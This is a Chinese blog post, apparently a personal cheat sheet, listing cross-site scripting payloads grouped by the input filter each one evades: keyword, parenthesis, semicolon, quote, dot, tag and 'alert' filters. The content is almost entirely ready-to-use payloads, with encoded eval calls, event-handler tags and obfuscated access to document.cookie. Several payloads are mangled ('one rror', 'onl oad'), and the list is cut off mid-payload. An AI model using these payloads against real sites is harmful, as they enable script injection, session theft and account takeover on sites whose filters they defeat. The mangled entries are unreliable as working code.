首页 > 其他分享 >xss注入

xss注入

时间:2022-11-04 20:12:46浏览次数:51  
标签:XSS php xss alert Injection document com 注入

 

Reflected XSS

Persistent XSS

DOM-based XSS

Mutation XSS

Universal Cross-site Scripting (UXSS)

通用跨站脚本攻击(UXSS)


<marquee>Mannix</marquee>

">"><script>with(document)alert(cookie)</script><"<"


javascript关键字过滤 +加号过滤

# document.cookie

document['coo'['CONCAT'.toLowerCase()]('kie')]

<script>alert(document['coo'['CONCAT'.toLowerCase()]('kie')])</script>

<script>alert(document['dom'['CONCAT'.toLowerCase()]('ain')])</script>


圆括号过滤

# alert(1)

alert`1`


;分号过滤

<img src=1 one rror=alert(1)>


单、双、反引号过滤

eval(String.fromCharCode(97,108,101,114,116,40,100,111,99,117,109,101,110,116,46,99,111,111,107,105,101,41))//

<script>eval(String.fromCharCode(97,108,101,114,116,40,100,111,99,117,109,101,110,116,46,99,111,111,107,105,101,41))//</script>


.过滤

with(location)alert(hash)

<script>with(location)alert(hash)</script>

<script>with(document)alert(cookie)</script>


html标签过滤、属性名过滤

<video width="0" height="0" oncanplay=alert`0`>

<source src="http://www.runoob.com/try/demo_source/mov_bbb.mp4" type="video/mp4"></video>

<details ontoggle=alert(1) open>

<marquee onscroll=alert(document.domain)>

img

svg

body

html

embed

script

object

details

isindex

iframe

audio

video


过滤alert

<script>window['alert'](1)</script>

<script>window['ale'+'rt'](1)</script>

<script>window["alert"](1)</script>

<script>window[`alert`](1)</script>

<script>parent['alert'](1)</script>

<script>self['alert'](1)</script>

<script>top['alert'](1)</script>

<script>frames['alert'](1)</script>

<script>self.frames['alert'](1)</script>

<script>self.parent['alert'](1)</script>

<script>self.top['alert'](1)</script>

top['aler'+'t'](1)

[1].find(confirm)

[1].map(confirm)

[1].some(confirm)

[1].every(confirm)

[1].filter(confirm)

[1].findIndex(confirm)

[1].map(alert)

[1].find(alert)

[1].every(alert)

[1].filter(alert)

[1].findIndex(alert)

[1].some(alert)

<script>[document.cookie].map(alert)</script>

<script>[1].map(alert)</script>

alert(document.domain)

YWxlcnQoZG9jdW1lbnQuZG9tYWluKQ==

<svg onl oad=eval(atob`YWxlcnQoZG9jdW1lbnQuZG9tYWluKQ==`)>

<svg onl oad=eval(atob`YWxlcnQoMSk=`)>

<svg onl oad=setTimeout(atob`YWxlcnQoMSk=`)>

<svg onl oad=setInterval(atob`YWxlcnQoMSk=`)>

<svg onl oad='new Function(atob`YWxlcnQoMSk=`)()'>

<svg onl oad=self[`ev`+`al`](atob`YWxlcnQoMSk=`)>

<script>document.write("<s","crip","t>al","ert(","1)","</s","cript>")</script>

<script>atob.constructor(atob`YWxlcnQoMSk`)``</script>

<script>atob.constructor(atob(/YWxlcnQoMSk/.source))()</script>

<script>window[Symbol.hasInstance]=eval

atob`YWxlcnQoMSk` instanceof window</script>

<script>atob.constructor(unescape([...escape((

标签:XSS,php,xss,alert,Injection,document,com,注入
From: https://www.cnblogs.com/jerry-autumn/p/16858967.html

相关文章

  • Koordinator v0.7: 为任务调度领域注入新活力
    简介: 在这个版本中着重建设了机器学习、大数据场景需要的任务调度能力,例如Coscheduling、ElasticQuota和精细化的GPU共享调度能力。并在调度问题诊断分析方面得到了增......
  • 声明Spring Bean和注入Bean的几种常用注解和区别
    Spring声明Bean的注解: @Component:组件,没有明确的角色。 @Service:在业务逻辑层(Service层)使用。@Repository: 再数据访问层(Dao层)使用。@Controller:再展现层(MVC->Sprin......
  • Spring Bean 的注册和注入的几种常用方式和区别
    Spring注册Bean:包扫描+组件标注注解(@Controller、@Service、@Repository、@Component),一般项目里面使用。使用@Bean注解,一般导入第三方组件的时候使用。使用@Import注解,一......
  • vue中的依赖注入provide和inject(简单易懂)
    本文开始,首先我们来看这两个词的意思,provide:提供  inject:注入 用处:父组件可以向其所有子组件传入数据,而“不管子组件层次结构有多深(非父子和父子咱都能传)” 特性......
  • 学习vue3(五)(插槽slot,Teleport传送组件,keep-alive缓存组件,依赖注入Provide / Inject)
    插槽slot插槽就是子组件中的提供给父组件使用的一个占位符,用<slot></slot>表示,父组件可以在这个占位符中填充任何模板代码,如HTML、组件等,填充的内容会替换子组件的<slot......
  • 远程代码注入
    原址:https://www.cnblogs.com/ndyxb/p/12751827.html 侵删学习:远程代码注入 远程DLL注入:适用于代码量大且复杂的情况远程DLL注入:需要先把注入代码放入某个DLL......
  • 引用类型属性自动注入-byName,byType,多个配置文件
    引用类型属性自动注入​ 对于引用类型属性的注入,也可不在配置文件中显示的注入。可以通过为标签设置autowire属性值,为引用类型属性进行隐式自动注入(默认是不自动注入......
  • 依赖注入_非空断言,css使用v-bind
    provide依赖注入//provide和inject通常成对一起使用,使一个祖先组件作为其后代组件的依赖注入方,无论这个组件的层级有多深都可以注入成功,只要他们处于同一条组件链上。......
  • 学习笔记-XSS
    XSS免责声明本文档仅供学习和研究使用,请勿使用文中的技术源码用于非法用途,任何人造成的任何负面影响,与本人无关.相关文章XSS插入绕过一些方式总结XSS总结......
  • 集合注入
    集合注入其实在实际的开发中很少用到1.注入数组对象<propertyname="array">  <array>     <value>100</value>     <value>200</value> ......